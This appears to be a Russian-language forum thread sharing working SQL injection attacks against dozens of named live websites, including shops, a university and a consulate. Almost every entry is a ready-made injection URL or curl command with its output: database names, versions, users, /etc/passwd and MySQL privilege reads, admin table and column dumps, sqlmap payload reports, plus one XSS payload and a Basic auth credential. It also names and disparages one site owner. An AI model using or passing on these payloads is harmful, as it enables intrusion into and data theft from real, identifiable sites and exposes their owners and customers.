stanok Code: http://stanok.in.ua/details.php?id=-21292%20union%20select%201,2,3,4,5,6,7,8,9,concat_ws(0x7c,database(),version(),user()),11,12,13,14,15,16,17,18,19,20 ininterne1_stan|5.5.42-log|[email protected] какой то испанский шоп Code: http://tecnicellmaracaibo.com/product.php?id=-175%27%20uNiOn%20SeLeCt%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13--+- tecni_sitio|5.6.43|tecni@localhost
Code: http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,concat_ws(0x7c,database(),version(),user()),12,13,14,15,16,17,18,19,20,21--+-&type=2 db_eircicai|5.5.51|koresoft@localhost и XSS тут же Code: http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,%3Cscript%3Ealert(%27xss/sqli%27)%3C/script%3E,12,13,14,15,16,17,18,19,20,21--+-&type=2
Code: http://www.vepakistan.com/detail.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),database(),user()),19,20--
Code: http://www.kaspiy.az/news.php?id=-103085 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -
Code: https://reference-audio-analyzer.pro/review-report.php?id=1691' AND (SELECT 3106 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(3106=3106,1))),0x717a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Pzbc'='Pzbc
MegaKeys.RU Code: https://megakeys.ru/soft/product.php?id_d=1972300%27%20union%20select%201,2,3,4,5,6,7,concat_ws(%27|%27,%20database(),user(),version()),9,10--+-#&rtype=good&page=9
Code: http://www.semsk.kz/newscat.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())+--+
BChainHacks Code: https://www.bchainhacks.com/event.php?id=-122%20%20UNION%20ALL%20SELECT%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 bchain_live|10.2.24-MariaDB|bchain_live_user@localhost
Code: www.all-guitar-chords.com/topic.php?id=-4794' union all select concat_ws(0x23,version(),database(),user(),load_file('/etc/passwd')),2,3,4,5,6,7,8,9,10,group_concat(concat_ws(0x3a3a,host,user,file_priv,insert_priv,update_priv) SEPARATOR " ") FROM mysql.user --%20 5.5.52-MariaDB Code: https://www.txdirectory.com/online/abc/detail.php?id=217 union select concat_ws(0x3a3a,version(),user(),database(),group_concat(table_name separator " ")),2,3,4 from information_schema.tables where table_schema=database() --%20 5.5.61-0ubuntu0.14.04.1-log Code: https://www.hotelnewsresource.com/go.php?id=-1298989163' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(substring(concat_ws(0x23,version(),(select schema_name from information_schema.schemata limit 3,1),(select file_priv from mysql.user where user='root' and host='localhost'),0x23), 1), floor(rand(0)*2))) --%20 5.5.60-MariaDB
curl http://bitcoin-office.com/globalscape-register-miner-contract.php --data "worker=azaza'and(extractvalue(1,concat(0x3b,(select/**/version()))))and'" Error: XPATH syntax error: ';10.1.41-MariaDB-cll-lve'
https://sarov.info Колючий Саров Яндекс ИКС (бывший тИЦ) 3600 Несколько SQL иньекций. Первая: Code: https://sarov.info/phones/yp/index.php?cat=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3+--+1 [email protected]:5.6.38:admin_bbnews Вторая: Code: curl https://sarov.info/bills/np/doubles.php --data "bill_id%5B1401653 and extractvalue(1,concat(0x3b,(select(version()))))%23%5D=on&delform=1" -H "Authorization: Basic a29sc2FyOmlsZW5hc2Fy" XPATH syntax error: ';5.6.38' Владелец ресурса, Кирилл Асташов aka BadBlock известный в Нижегородской области борец с экстремизмом в комментариях, с последующими заявлениями в центр "Э".
Code: https://www.6-movies.com/category.php?id=28 union select 1,2,concat_ws(0x3a3a,version(),user(),group_concat(column_name)),4,5,6,7 from information_schema.columns where table_name='chatusers' and table_schema='NauGerComDB2' --%20 5.5.55-0+deb8u1 Code: www.nwu.edu.bd/news_details.php?id=-37 '/*!50000union*/ /*!50000select*/ concat_ws(0x2323,version(),group_concat(table_name)),2 from /*!50000information_schema.tables where table_schema='nwuedu_web'*/ --%20 5.6.41-84.1 Code: www.tpmrotator.com/list.php?id=-2522' union select concat_ws(0x2323,version(),database(),user(),group_concat(table_name separator " ")) from information_schema.tables where table_schema=database() --%20 5.5.60-MariaDB Code: www.asfaa.org/members.php?id=-14 union select 1,concat_ws(0x23,@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),3,group_concat(table_name separator " ") from information_schema.tables where table_schema=database() --%20 5.6.36-82.0 Code: https://www.testprepkart.com/sat/blog-single.php?id=-12' union select 1,group_concat(column_name separator " "),3,4,5,6,7,concat_ws(0x3a3a,version(),database(),user(),@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),9,10,11,12,13,14,15,16 from information_schema.columns where table_name='admin' and table_schema=database() --%20 5.6.38 Code: https://www.nhe-group.com/category.php?id=-31 '/*!50000union*/ /*!50000select*/ 1,2,3,4,group_concat(column_name),6,7,8,concat_ws(0x2323,version(),user(),0x2323),10,11,12,13,14,15 from /*!50000information_schema.columns where table_schema='ibrahim2_nhegroup' and table_name='admins'*/ --%20 5.6.32-78.1 Code: https://www.htrends.com/go.php?id=927823727' or (select count(*) from (select 1 union select 2 union select 3)b group by concat(mid(concat_ws(0x3a3a,version(),(select schema_name from information_schema.schemata limit 0,1)),1,63), floor(rand(0)*2))) --%20 5.5.60-MariaDB Code: www.consuladoportugalgoa.com/pages.php?id=-2 union select 1,concat_ws(0x2323,version(),user(),@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),group_concat(column_name),4,5,6 from information_schema.columns where table_schema='consulad_con_pc' and table_name='users'--%20 5.7.27 Code: https://www.nitolinsurance.com/news_details.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3,group_concat(column_name) from information_schema.columns where table_schema='nitolins_website' and table_name='admin' --%20 10.1.41-MariaDB Code: http://www.ssy.org/detail.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3,group_concat(cast(table_name as char)),(select cast(schema_name as char) from information_schema.schemata limit 0,1),6,7,8,9,10,11,12,13 from information_schema.tables where table_schema='ssy_datassy' --%20 5.6.45 Code: https://www.compassboxwhisky.com/blog/post-print.php?id=-19' union select 1,concat_ws(0x2323,version(),user()),3,4,5,(select file_priv from mysql.user where user='compassbox'),7,group_concat(table_name),9,10,11,12 from information_schema.tables where table_schema='compassbox' --%20 5.5.60-MariaDB Code: https://www.faithandpublicpolicy.org/news.php?id=-464' union select group_concat(table_name),concat_ws(0x2323,version(),user(),(select file_priv from mysql.user where user='webuser')),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema='sys'--%20 5.7.25
Code: http://www.ibins.ru/useful.php?id=-1%27union+select+1,version(),3,4,database()--+ version: 5.6.25-73.1 Code: [/B] [B]https://www.russianspares.com/products.php?cat=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ version 5.6.45 Code: https://www.wjhy.com.hk/en/product_detail.php?id=25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,VERSION(),18,19,20,21,22,23--+ version 5.5.40
Фрагментированная sql injection в скрипте spartak bux, на нем работают не плохое проекты. ||extractvalue(1,concat(0x3a,(select @@version)))# Список уязвимых сайтов: (можно найти еще) Post запрос (для hack bar) Для новичков
glassofvenice.com интернет магазин внутри много интересного. Code: https://www.glassofvenice.com/landingpages.php?lp=murano-glass-beads&filters=36_10_38 Parameter: lp (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: lp=murano-glass-beads' AND 5931=5931 AND 'HFLm'='HFLm&filters=36_10_38 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: lp=murano-glass-beads' AND (SELECT 2228 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(2228=2228,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rqhj'='rqhj&filters=36_10_38 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: lp=murano-glass-beads' AND SLEEP(5) AND 'AqWz'='AqWz&filters=36_10_38 Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: lp=-8269' UNION ALL SELECT 53,53,53,53,53,53,CONCAT(0x717a6b7a71,0x4a61754d67545a515571454669416b6f567a4d68696c4c4b57546d4a4b4a434c7752545479434164,0x7171766b71),53,53-- lNAv&filters=36_10_38 --- web server operating system: Linux Debian 9.0 (stretch) web application technology: Apache 2.4.25 back-end DBMS: MySQL >= 5.0 Database: glassdb [145 tables] +----------------------------------------------------+ | address_book | | address_format | | admin | | admin_files | | admin_groups | | admin_logs | | affiliate_affiliate | | affiliate_banners | | affiliate_banners_history | | affiliate_clickthroughs | | affiliate_news | | affiliate_news_contents | | affiliate_newsletters | | affiliate_payment | | affiliate_payment_status | | affiliate_payment_status_history | | affiliate_sales | | amzn_orders | | amzn_orders_items | | amzn_products | | amzn_products_description | | amzn_products_report | | amzn_reviews | | amzn_seller_feedbacks | | banners | | banners_history | | cache | | cache_filters | | cart_reminder | | catalog_product_entity | | categories | | categories_description | | configuration | | configuration_group | | contrib_tracker | | counter | | counter_history | | countries | | coupon_email_track | | coupon_gv_customer | | coupon_gv_queue | | coupon_redeem_track | | coupons | | coupons_description | | currencies | | customer_entity | | customers | | customers_basket | | customers_basket_attributes | | customers_basket_info | | customers_info | | customers_points_pending | | customers_temp | | directory_country | | directory_country_region | | dos_protect | | eav_attribute | | eav_attribute_option | | eav_attribute_option_value | | emails_templates | | etsy_products | | etsy_products_images | | etsy_taxonomies | | filter_product_options | | filter_products_attributes | | filter_products_options_values | | filter_products_options_values_to_products_options | | geo_zones | | giftwrap_options | | google_checkout | | google_configuration | | google_orders | | headertags | | headertags_cache | | headertags_default | | headertags_pages | | headertags_silo | | inv_inventory_purchases | | inv_model_xref | | jet_orders | | jet_orders_products | | jet_returns | | jet_returns_products | | jet_returns_products_refund_amount | | landing_pages | | landing_pages_products | | languages | | mage_orders | | mage_orders_products | | manufacturers | | manufacturers_info | | newsletters | | orders | | orders_products | | orders_products_attributes | | orders_products_download | | orders_status | | orders_status_history | | orders_status_history_transactions | | orders_total | | products | | products_attributes | | products_attributes_download | | products_attributes_relations | | products_attributes_sets | | products_attributes_sets_elements | | products_attributes_sets_to_products | | products_description | | products_extra_images | | products_notifications | | products_options | | products_options_values | | products_options_values_to_products_options | | products_recommend | | products_taxonomy_mapping | | products_to_categories | | products_variants | | products_variants_images | | products_variants_to_products_attributes | | products_xsell | | reviews | | reviews_description | | rma_return_reasons | | scart | | search_queries | | search_queries_sorted | | searchword_swap | | sessions | | sitemap_exclude | | sliders | | sliders_description | | sliders_images | | sliders_images_links | | specials | | tax_class | | tax_rates | | visitor | | visual_verify_code | | whos_online | | wishlists | | wishlists_products | | wm_products | | ws_products | | zones | | zones_to_geo_zones | +----------------------------------------------------+
fantasycruncher.com сайт спортивной тематики, права на чтение паролей MySQL и всех бд Code: https://www.fantasycruncher.com/cheatsheet.php?id=783b2c1a48b5b3e0 Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=783b2c1a48b5b3e0' AND 1291=1291 AND 'YNvr'='YNvr Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=783b2c1a48b5b3e0' AND SLEEP(5) AND 'KAys'='KAys --- web application technology: PHP 5.6.29, Nginx 1.10.1 back-end DBMS: MySQL 5 (MariaDB fork)
